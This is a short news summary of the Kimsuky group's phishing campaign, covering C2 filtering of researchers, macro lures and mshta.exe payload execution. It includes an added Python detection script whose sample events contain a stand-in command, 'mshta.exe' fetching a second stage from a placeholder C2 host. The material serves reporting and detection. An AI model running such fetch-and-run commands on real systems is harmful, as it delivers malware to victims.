"How 'Kimsuky' Hackers Ensure Their Malware Only Reach Valid Targets"

North Korean 'Kimsuky' threat actors are trying to ensure that their malicious payloads are downloaded only by legitimate targets and not by security researchers' systems. The group has been using new techniques to filter out invalid download requests since the beginning of 2022, when it launched a new campaign against various targets on the Korean peninsula. Kimsuky's new safeguards are so effective that researchers were unable to acquire the final payloads even after successfully connecting to the threat actor's command-and-control (C2) server.

The attacks detected by security researchers begin with a phishing email sent to North and South Korean politicians, diplomats, university professors, and journalists. Retrieved C2 scripts containing partial email addresses of targets allowed the researchers to compile a list of potential targets. The emails include a link that directs victims to a first-stage C2 server, which checks and verifies a few parameters before delivering a malicious document. If the visitor does not match the criteria, they are served an innocuous document instead. At the same time, the visitor's IP address is forwarded to the second-stage C2 server, which uses it as a further check. The malicious macro in the document dropped by the first-stage C2 connects the victim to the second-stage C2, fetches the next-stage payload, and runs it with the mshta.exe process.

Kimsuky is said to be a highly sophisticated threat actor and has recently been seen deploying custom malware and stealing emails from victims via Google Chrome extensions. This article continues to discuss Kimsuky's targets and latest infection process.
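The last step of the chain described above, an Office macro handing a fetched payload to mshta.exe, is something endpoint telemetry can flag regardless of whether the C2 ever serves researchers the final stage. The following is an added detection example, not code from the article or from any vendor; the event field names (`parent`, `image`, `cmdline`) and the sample events are constructed assumptions.

```python
"""Flag the Office-macro -> mshta.exe launch pattern in process-creation events.

Added example: field names and sample events are constructed, not taken
from the article or from any real telemetry source.
"""
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SUSPECT_CHILDREN = {"mshta.exe"}

# Constructed sample events (assumed schema: parent, image, cmdline).
EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://c2.example.invalid/stage2"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Users\u\app.hta"},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},
]


def basename(path):
    """Return the lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return a severity for one event, or None if it is not of interest.

    high   : Office parent spawns mshta.exe with a remote URL on the command line
             (the macro -> second-stage C2 -> mshta.exe step described above)
    medium : Office parent spawns mshta.exe without a visible remote URL
    low    : mshta.exe launched by a non-Office parent (worth a look, not alone)
    """
    parent = basename(event["parent"])
    image = basename(event["image"])
    if image not in SUSPECT_CHILDREN:
        return None
    if parent in OFFICE_PARENTS:
        remote = re.search(r"https?://\S+", event["cmdline"], re.IGNORECASE)
        return "high" if remote else "medium"
    return "low"


def scan(events):
    """Return (index, severity) for every event that classify() flags."""
    return [(i, classify(e)) for i, e in enumerate(events) if classify(e)]
```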

Bleeping Computer reports "How 'Kimsuky' Hackers Ensure Their Malware Only Reach Valid Targets"
